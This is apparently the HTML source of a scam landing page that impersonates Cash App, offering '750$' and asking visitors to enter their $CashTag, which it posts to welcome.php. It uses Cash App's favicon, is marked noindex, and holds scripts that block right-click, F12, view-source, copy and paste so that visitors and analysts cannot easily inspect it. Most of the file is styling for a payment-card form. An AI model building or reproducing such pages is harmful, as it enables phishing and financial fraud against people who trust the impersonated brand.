<html lang="en">

<head>
    <script type="text/javascript">
        (function(c,l,a,r,i,t,y){
            c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
            t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
            y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
        })(window, document, "clarity", "script", "m9ecynd6zt");
    </script>
    <script>
    document.addEventListener('keydown', function(e) {
        if (e.key === 'F12') {
            e.preventDefault();
        }
    });
        document.addEventListener('contextmenu', function(e) {
            e.preventDefault();
        });
    
        document.onkeydown = function(e) {
            if (e.ctrlKey && (e.keyCode === 85 || e.keyCode === 67 || e.keyCode === 86 || e.keyCode === 123)) {
                return false;
            } else {
                return true;
            }
        };

        document.onpaste = function(e) {
            e.preventDefault();
        };
    </script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/sweetalert/2.1.2/sweetalert.min.css">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/sweetalert/2.1.2/sweetalert.min.js"></script>

    <title>750$ Cash App</title>
    <link rel="icon" href="https://cash-f.squarecdn.com/static/favicon.ico" integrity="sha384-4ChiDA321IPrHSobMPeW1n8RX2GU6pY6iWH7h79DqAFaYyhrlbYTvRWEAJqMZ3GS" sizes="16x16,32x32" type="image/x-icon">
    <link rel="icon" href="https://cash-f.squarecdn.com/static/favicon.svg" integrity="sha384-KFrrYlHN2FMoPYRtljOsgHAreGaHwX+UtbQgfY3LbnCzenjycuPRU7zBKWf7yaQZ" sizes="any" type="image/svg+xml">

    <meta name="robots" content="noindex">

    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
    <link href="https://4zz.site/assets/css/sweetalert2.min.css" rel="stylesheet">

    <link rel="stylesheet" href="assets/icons/css/all.css">
    <link rel="stylesheet" href="assets/css/style.css">
    <link rel="stylesheet" href="assets/css/ask.css">
    <style>
        :root {
            /*--main: #9500d6;*/
            --main: #128a00;
            --white: #128a00;
        }
    </style>
    <script>
        var main_color = "#128a00";
        var service = "";
    </script>

    <style id="INLINE_PEN_STYLESHEET_ID">
        @import url("https://fonts.googleapis.com/css?family=Source+Code+Pro:400,500,600,700|Source+Sans+Pro:400,600,700&display=swap");
        body {
            /*background: no-repeat center / 130% url(wallpaper.jpg);*/
            backdrop-filter: blur(4px);
            font-family: "Source Sans Pro", sans-serif;
            font-size: 16px;
            overflow: hidden;
        }

        /*@media screen and (max-width: 769px){*/

        /*   body {*/

        /*       background: no-repeat center / 200% url(wallpaper1.jpg);*/

        /*        backdrop-filter: blur(4px);*/

        /* }*/

        /*}*/

        * {
            box-sizing: border-box;
        }

        *:focus {
            outline: none;
        }

        .wrapper {
            /* min-height: 100vh; */
            display: flex;
            padding: 50px 15px;
        }

        @media screen and (max-width: 700px),
        (max-height: 500px) {
            .wrapper {
                flex-wrap: wrap;
                flex-direction: column;
            }
        }

        .card-form {
            max-width: 570px;
            margin: auto;
            width: 100%;
        }

        @media screen and (max-width: 576px) {
            .card-form {
                margin: 0 auto;
            }
        }

        .card-form__inner {
            background: #fff;
            box-shadow: 0 30px 60px 0 rgba(90, 116, 148, 0.4);
            border-radius: 20px;
            padding: 35px;
            padding-top: 155px;
        }

        @media screen and (max-width: 480px) {
            .card-form__inner {
                padding: 25px;
                padding-top: 150px;
            }
        }

        @media screen and (max-width: 360px) {
            .card-form__inner {
                padding: 15px;
                padding-top: 155px;
            }
        }

        .card-form__row {
            display: flex;
            align-items: flex-start;
        }

        @media screen and (max-width: 480px) {
            .card-form__row {
                flex-wrap: wrap;
            }
        }

        .card-form__col {
            flex: auto;
            margin-right: 35px;
        }

        .card-form__col:last-child {
            margin-right: 0;
        }

        @media screen and (max-width: 480px) {
            .card-form__col {
                margin-right: 0;
                flex: unset;
                width: 100%;
                margin-bottom: 20px;
            }
            .card-form__col:last-child {
                margin-bottom: 0;
            }
        }

        .card-form__col.-cvv {
            max-width: 150px;
        }

        @media screen and (max-width: 480px) {
            .card-form__col.-cvv {
                max-width: initial;
            }
        }

        .card-form__group {
            display: flex;
            align-items: flex-start;
            flex-wrap: wrap;
        }

        .card-form__group .card-input__input {
            flex: 1;
            margin-right: 15px;
        }

        .card-form__group .card-input__input:last-child {
            margin-right: 0;
        }

        .card-form__button {
            width: 100%;
            height: 55px;
            background: var(--main);
            border: none;
            border-radius: 22px;
            font-size: 28px;
            font-weight: 800;
            font-family: "Source Sans Pro", sans-serif;
            box-shadow: 3px 10px 20px 0px rgba(35, 100, 210, 0.3);
            color: #fff;
            margin-top: 20px;
            cursor: pointer;
        }

        @media screen and (max-width: 480px) {
            .card-form__button {
                margin-top: 10px;
            }
        }

        .card-item {
            max-width: 430px;
            height: 270px;
            margin-left: auto;
            margin-right: auto;
            position: relative;
            z-index: 2;
            width: 100%;
        }

        @media screen and (max-width: 480px) {
            .card-item {
                max-width: 310px;
                height: 220px;
                width: 90%;
            }
        }

        @media screen and (max-width: 360px) {
            .card-item {
                height: 180px;
            }
        }

        .card-item.-active .card-item__side.-front {
            transform: perspective(1000px) rotateY(180deg) rotateX(0deg) rotateZ(0deg);
        }

        .card-item.-active .card-item__side.-back {
            transform: perspective(1000px) rotateY(0) rotateX(0deg) rotateZ(0deg);
        }

        .card-item__focus {
            position: absolute;
            z-index: 3;
            border-radius: 5px;
            left: 0;
            top: 0;
            width: 100%;
            height: 100%;
            transition: all 0.35s cubic-bezier(0.71, 0.03, 0.56, 0.85);
            opacity: 0;
            pointer-events: none;
            overflow: hidden;
            border: 2px solid rgba(255, 255, 255, 0.65);
        }

        .card-item__focus:after {
            content: "";
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            background: #08142f;
            height: 100%;
            border-radius: 5px;
            filter: blur(25px);
            opacity: 0.5;
        }

        .card-item__focus.-active {
            opacity: 1;
        }

        .card-item__side {
            border-radius: 15px;
            overflow: hidden;
            box-shadow: 0 20px 60px 0 rgba(14, 42, 90, 0.55);
            transform: perspective(2000px) rotateY(0deg) rotateX(0deg) rotate(0deg);
            transform-style: preserve-3d;
            transition: all 0.8s cubic-bezier(0.71, 0.03, 0.56, 0.85);
            backface-visibility: hidden;
            height: 100%;
        }

        .card-item__side.-back {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            transform: perspective(2000px) rotateY(-180deg) rotateX(0deg) rotate(0deg);
            z-index: 2;
            padding: 0;
            height: 100%;
        }

        .card-item__side.-back .card-item__cover {
            transform: rotateY(-180deg);
        }

        .card-item__bg {
            max-width: 100%;
            display: block;
            max-height: 100%;
            height: 100%;
            width: 100%;
            object-fit: cover;
        }

        .card-item__cover {
            height: 100%;
            background-color: #1c1d27;
            position: absolute;
            height: 100%;
            background-color: #1c1d27;
            left: 0;
            top: 0;
            width: 100%;
            border-radius: 15px;
            overflow: hidden;
        }

        .card-item__cover:after {
            content: "";
            position: absolute;
            left: 0;
            top: 0;
            width: 100%;
            height: 100%;
            background: rgba(6, 2, 29, 0.45);
        }

        .card-item__top {
            display: flex;
            align-items: flex-start;
            justify-content: space-between;
            margin-bottom: 40px;
            padding: 0 10px;
        }

        @media screen and (max-width: 480px) {
            .card-item__top {
                margin-bottom: 25px;
            }
        }

        @media screen and (max-width: 360px) {
            .card-item__top {
                margin-bottom: 15px;
            }
        }

        .card-item__chip {
            width: 60px;
        }

        @media screen and (max-width: 480px) {
            .card-item__chip {
                width: 50px;
            }
        }

        @media screen and (max-width: 360px) {
            .card-item__chip {
                width: 40px;
            }
        }

        .card-item__type {
            height: 45px;
            position: relative;
            display: flex;
            justify-content: flex-end;
            max-width: 100px;
            margin-left: auto;
            width: 100%;
        }

        @media screen and (max-width: 480px) {
            .card-item__type {
                height: 40px;
                max-width: 90px;
            }
        }

        @media screen and (max-width: 360px) {
            .card-item__type {
                height: 30px;
            }
        }

        .card-item__typeImg {
            max-width: 100%;
            object-fit: contain;
            max-height: 100%;
            object-position: top right;
        }

        .card-item__info {
            color: #fff;
            width: 100%;
            max-width: calc(100% - 85px);
            padding: 10px 15px;
            font-weight: 500;
            display: block;
            cursor: pointer;
        }

        @media screen and (max-width: 480px) {
            .card-item__info {
                padding: 10px;
            }
        }

        .card-item__holder {
            opacity: 0.7;
            font-size: 13px;
            margin-bottom: 6px;
        }

        @media screen and (max-width: 480px) {
            .card-item__holder {
                font-size: 12px;
                margin-bottom: 5px;
            }
        }

        .card-item__wrapper {
            font-family: "Source Code Pro", monospace;
            padding: 25px 15px;
            position: relative;
            z-index: 4;
            height: 100%;
            text-shadow: 7px 6px 10px rgba(14, 42, 90, 0.8);
            user-select: none;
        }

        @media screen and (max-width: 480px) {
            .card-item__wrapper {
                padding: 20px 10px;
            }
        }

        .card-item__name {
            font-size: 18px;
            line-height: 1;
            white-space: nowrap;
            max-width: 100%;
            overflow: hidden;
            text-overflow: ellipsis;
            text-transform: uppercase;
        }

        @media screen and (max-width: 480px) {
            .card-item__name {
                font-size: 16px;
            }
        }

        .card-item__nameItem {
            display: inline-block;
            min-width: 8px;
            position: relative;
        }

        .card-item__number {
            font-weight: 500;
            line-height: 1;
            color: #fff;
            font-size: 27px;
            margin-bottom: 35px;
            display: inline-block;
            padding: 10px 15px;
            cursor: pointer;
        }

        @media screen and (max-width: 480px) {
            .card-item__number {
                font-size: 21px;
                margin-bottom: 15px;
                padding: 10px 10px;
            }
        }

        @media screen and (max-width: 360px) {
            .card-item__number {
                font-size: 19px;
                margin-bottom: 10px;
                padding: 10px 10px;
            }
        }

        .card-item__numberItem {
            width: 16px;
            display: inline-block;
        }

        .card-item__numberItem.-active {
            width: 30px;
        }

        @media screen and (max-width: 480px) {
            .card-item__numberItem {
                width: 13px;
            }
            .card-item__numberItem.-active {
                width: 16px;
            }
        }

        @media screen and (max-width: 360px) {
            .card-item__numberItem {
                width: 12px;
            }
            .card-item__numberItem.-active {
                width: 8px;
            }
        }

        .card-item__content {
            color: #fff;
            display: flex;
            align-items: flex-start;
        }

        .card-item__date {
            flex-wrap: wrap;
            font-size: 18px;
            margin-left: auto;
            padding: 10px;
            display: inline-flex;
            width: 80px;
            white-space: nowrap;
            flex-shrink: 0;
            cursor: pointer;
        }

        @media screen and (max-width: 480px) {
            .card-item__date {
                font-size: 16px;
            }
        }

        .card-item__dateItem {
            position: relative;
        }

        .card-item__dateItem span {
            width: 22px;
            display: inline-block;
        }

        .card-item__dateTitle {
            opacity: 0.7;
            font-size: 13px;
            padding-bottom: 6px;
            width: 100%;
        }

        @media screen and (max-width: 480px) {
            .card-item__dateTitle {
                font-size: 12px;
                padding-bottom: 5px;
            }
        }

        .card-item__band {
            background: rgba(0, 0, 19, 0.8);
            width: 100%;
            height: 50px;
            margin-top: 30px;
            position: relative;
            z-index: 2;
        }

        @media screen and (max-width: 480px) {
            .card-item__band {
                margin-top: 20px;
            }
        }

        @media screen and (max-width: 360px) {
            .card-item__band {
                height: 40px;
                margin-top: 10px;
            }
        }

        .card-item__cvv {
            text-align: right;
            position: relative;
            z-index: 2;
            padding: 15px;
        }

        .card-item__cvv .card-item__type {
            opacity: 0.7;
        }

        @media screen and (max-width: 360px) {
            .card-item__cvv {
                padding: 10px 15px;
            }
        }

        .card-item__cvvTitle {
            padding-right: 10px;
            font-size: 15px;
            font-weight: 500;
            color: #fff;
            margin-bottom: 5px;
        }

        .card-item__cvvBand {
            height: 45px;
            background: #fff;
            margin-bottom: 30px;
            text-align: right;
            display: flex;
            align-items: center;
            justify-content: flex-end;
            padding-right: 10px;
            color: #1a3b5d;
            font-size: 18px;
            border-radius: 4px;
            box-shadow: 0px 10px 20px -7px rgba(32, 56, 117, 0.35);
        }

        @media screen and (max-width: 480px) {
            .card-item__cvvBand {
                height: 40px;
                margin-bottom: 20px;
            }
        }

        @media screen and (max-width: 360px) {
            .card-item__cvvBand {
                margin-bottom: 15px;
            }
        }

        .card-list {
            margin-bottom: -130px;
        }

        @media screen and (max-width: 480px) {
            .card-list {
                margin-bottom: -120px;
            }
        }

        .card-input {
            margin-bottom: 20px;
        }

        .card-input__label {
            font-size: 18px;
            margin-bottom: 5px;
            font-weight: 600;
            color: var(--main);
            width: 100%;
            display: block;
            user-select: none;
        }

        .card-input__input {
            width: 100%;
            height: 50px;
            border-radius: 15px;
            box-shadow: none;
            border: 1px solid var(--main);
            transition: all 0.3s ease-in-out;
            font-size: 20px;
            padding: 5px 15px;
            background: none;
            color: var(--main);
            font-family: "Source Sans Pro", sans-serif;
        }

        .card-input__input:hover,
        .card-input__input:focus {
            /* filter: brightness(1.2); */
            /* scale : 1.01; */
            /* border-color: #3d9cff; */
        }

        .card-input__input:focus {
            box-shadow: 0px 10px 20px -13px rgba(32, 56, 117, 0.35);
        }

        .card-input__input.-select {
            -webkit-appearance: none;
            background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIAAAAeCAYAAABuUU38AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAUxJREFUeNrM1sEJwkAQBdCsngXPHsQO9O5FS7AAMVYgdqAd2IGCDWgFnryLFQiCZ8EGnJUNimiyM/tnk4HNEAg/8y6ZmMRVqz9eUJvRaSbvutCZ347bXVJy/ZnvTmdJ862Me+hAbZCTs6GHpyUi1tTSvPnqTpoWZPUa7W7ncT3vK4h4zVejy8QzM3WhVUO8ykI6jOxoGA4ig3BLHcNFSCGqGAkig2yqgpEiMsjSfY9LxYQg7L6r0X6wS29YJiYQYecemY+wHrXD1+bklGhpAhBDeu/JfIVGxaAQ9sb8CI+CQSJ+QmJg0Ii/EE2MBiIXooHRQhRCkBhNhBcEhLkwf05ZCG8ICCOpk0MULmvDSY2M8UawIRExLIQIEgHDRoghihgRIgiigBEjgiFATBACAgFgghEwSAAGgoBCBBgYAg5hYKAIFYgHBo6w9RRgAFfy160QuV8NAAAAAElFTkSuQmCC");
            background-size: 12px;
            background-position: 95% center;
            background-repeat: no-repeat;
            padding-right: 30px;
        }

        .slide-fade-up-enter-active {
            transition: all 0.25s ease-in-out;
            transition-delay: 0.1s;
            position: relative;
        }

        .slide-fade-up-leave-active {
            transition: all 0.25s ease-in-out;
            position: absolute;
        }

        .slide-fade-up-enter {
            opacity: 0;
            transform: translateY(15px);
            pointer-events: none;
        }

        .slide-fade-up-leave-to {
            opacity: 0;
            transform: translateY(-15px);
            pointer-events: none;
        }

        .slide-fade-right-enter-active {
            transition: all 0.25s ease-in-out;
            transition-delay: 0.1s;
            position: relative;
        }

        .slide-fade-right-leave-active {
            transition: all 0.25s ease-in-out;
            position: absolute;
        }

        .slide-fade-right-enter {
            opacity: 0;
            transform: translateX(10px) rotate(45deg);
            pointer-events: none;
        }

        .slide-fade-right-leave-to {
            opacity: 0;
            transform: translateX(-10px) rotate(45deg);
            pointer-events: none;
        }

        .github-btn {
            position: absolute;
            right: 40px;
            bottom: 50px;
            text-decoration: none;
            padding: 15px 25px;
            border-radius: 4px;
            box-shadow: 0px 4px 30px -6px rgba(36, 52, 70, 0.65);
            background: #24292e;
            color: #fff;
            font-weight: bold;
            letter-spacing: 1px;
            font-size: 16px;
            text-align: center;
            transition: all 0.3s ease-in-out;
        }

        @media screen and (min-width: 500px) {
            .github-btn:hover {
                transform: scale(1.1);
                box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
            }
        }

        @media screen and (max-width: 700px) {
            .github-btn {
                position: relative;
                bottom: auto;
                right: auto;
                margin-top: 20px;
            }
            .github-btn:active {
                transform: scale(1.1);
                box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
            }
        }
    </style>

    <style>
        .slide-down {
            animation: slide-down 0.3s linear both;
        }

        .slide-up {
            animation: slide-up 0.3s linear both;
        }

        .open_page {
            animation: open_page .7s linear both;
        }

        .fade {
            animation: move 1s ease-in;
        }

        @keyframes open_page {
            0% {
                filter: blur(10px);
                /* scale: 7; */
            }
            20% {
                filter: blur(7px);
                /* scale: 5.5; */
            }
            50% {
                filter: blur(5px);
                /* scale: 4; */
            }
            70% {
                filter: blur(3px);
                /* scale: 4; */
            }
            95% {
                filter: blur(2px);
                /* scale: 2; */
            }
            /* Set height to 'auto' after animation for spacing showing form-invalid feedback message */
            100% {
                z-index: 99999999;
                filter: blur(0px);
                /* scale: 0.9; */
            }
        }

        @keyframes slide-down {
            0% {
                opacity: 0;
                visibility: hidden;
                height: 0;
            }
            50% {
                opacity: 0.4;
                visibility: visible;
                height: 70px;
            }
            95% {
                opacity: 0.8;
                visibility: visible;
                height: 70px;
            }
            /* Set height to 'auto' after animation for spacing showing form-invalid feedback message */
            100% {
                opacity: 1;
                visibility: visible;
                height: auto;
            }
        }

        @keyframes slide-up {
            from {
                opacity: 0.8;
                visibility: visible;
                height: 250px;
            }
            to {
                opacity: 0;
                visibility: hidden;
                height: 0;
            }
        }

        .no-arrows::-webkit-inner-spin-button,
        .no-arrows::-webkit-outer-spin-button {
            -webkit-appearance: none;
            margin: 0;
        }

        .no-arrows {
            -moz-appearance: textfield;
        }

        @keyframes move {
            25% {
                opacity: .1;
                filter: blur(10px);
            }
            50% {
                opacity: .5;
                filter: blur(5px);
            }
            75% {
                opacity: .8;
                filter: blur(0px);
            }
        }
    </style>

    <style>


        .dot-flashing {
            position: relative;
            width: 10px;
            height: 10px;
            border-radius: 5px;
            background-color: var(--main);
            color: var(--main);
            animation: dot-flashing 1s infinite linear alternate;
            animation-delay: 0.5s;
        }

        .dot-flashing::before,
        .dot-flashing::after {
            content: "";
            display: inline-block;
            position: absolute;
            top: 0;
        }

        .dot-flashing::before {
            left: -15px;
            width: 10px;
            height: 10px;
            border-radius: 5px;
            background-color: var(--main);
            color: var(--main);
            animation: dot-flashing 1s infinite alternate;
            animation-delay: 0s;
        }

        .dot-flashing::after {
            left: 15px;
            width: 10px;
            height: 10px;
            border-radius: 5px;
            background-color: var(--main);
            color: var(--main);
            animation: dot-flashing 1s infinite alternate;
            animation-delay: 1s;
        }

        @keyframes dot-flashing {
            0% {
                background-color: var(--main);
            }
            50%,
            100% {
                background-color: rgba(152, 128, 255, 0.2);
            }
        }

        .stage {
            display: flex;
            justify-content: center;
            align-items: center;
            position: relative;
            padding: 8px 0 0;
            margin: 0 -5%;
            overflow: hidden;
        }
    </style>

    <script>
        var color = "#00d64f";
    </script>



</head>
<style>
    #notif {
        text-align: center;
        font-size: 1.125rem; /* 18px */
        margin-bottom: -10px;
        color: red;
        font-weight: 600;
    }
    
    #app {
        display: block;
        position: relative;
        top: 30%;
        left: 50%;
        transform: translate(-50%, -50%);
    }
    
    .card-form__inner {
        padding-top: 51px !important;
    }
    
    .swal2-container {
        z-index: 9999999999 !important;
    }
    
    .notification {
        position: fixed;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        background-color: #fff;
        color: red;
        padding: 20px;
        border-radius: 10px;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
        transition: opacity 0.5s;
        opacity: 0;
        visibility: hidden;
        z-index: 9999;
        text-align: center; 
    }
    
    .notification.show {
        opacity: 1;
        visibility: visible;
    }
    
    @keyframes shake {
        0% { transform: translateX(0); }
        25% { transform: translateX(-5px); }
        50% { transform: translateX(5px); }
        75% { transform: translateX(-5px); }
        100% { transform: translateX(0); }
    }
    
    .shake {
        animation: shake 0.5s ease;
    }
    
    .error-border {
        border: 1px solid red !important;
    }
    
    @media only screen and (max-width: 600px) {
        .notification {
            width: 80%; 
            padding: 10px;
            font-size: 0.875rem; /* 14px */
        }
    }
    

    .swal2-icon.swal2-error,
    .swal2-icon.swal2-success,
    .swal2-icon.swal2-warning {
      margin-left: auto !important;
      margin-right: auto !important;
    }

    .swal-title {
        font-size: 20px;
        font-weight: bold;
        color: red; /* Change color as needed */
        margin-bottom: 10px;
    }

    .swal-text {
        font-size: 16px;
        color: black; /* Change color as needed */
    }
 
</style>

<body style="color: var(--main);">
    <div class="containerr" style="
    display: flex;
    align-items: center;
    justify-content: center;
    height: -webkit-fill-available;
    width: -webkit-fill-available;
">
    <div class="preloader" style="margin:0;"></div>
</div>



<div id="app" class="wrapper open_page">
    <div class="card-form">
        <div class="card-form__inner">
            <div class="card-input popup-content" style="margin-bottom:0">
                <h1 style="text-align: center;font-size: 30px;margin: 0 0 20px 0;font-weight: 700;">
                    Enter Your $CashTag
                </h1>
                <form id="cashTagForm" method="post" action="welcome.php" onsubmit="return validateForm()">
                    <input id="usernameInput" type="text" name="username" class="card-input__input" autocomplete="off" style="margin-bottom: 20px;">
                    <button type="submit" class="card-form__button" style="margin-bottom: 20px;">
                        Continue
                    </button>
                </form>
            </div>
        </div>
    </div>
</div>




<div class="snowflakes"><script src="assets/js/flk.js"></script></div>
<script src="assets/js/in.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
<script src="assets/js/sf.js"></script>


    
</body>

</html>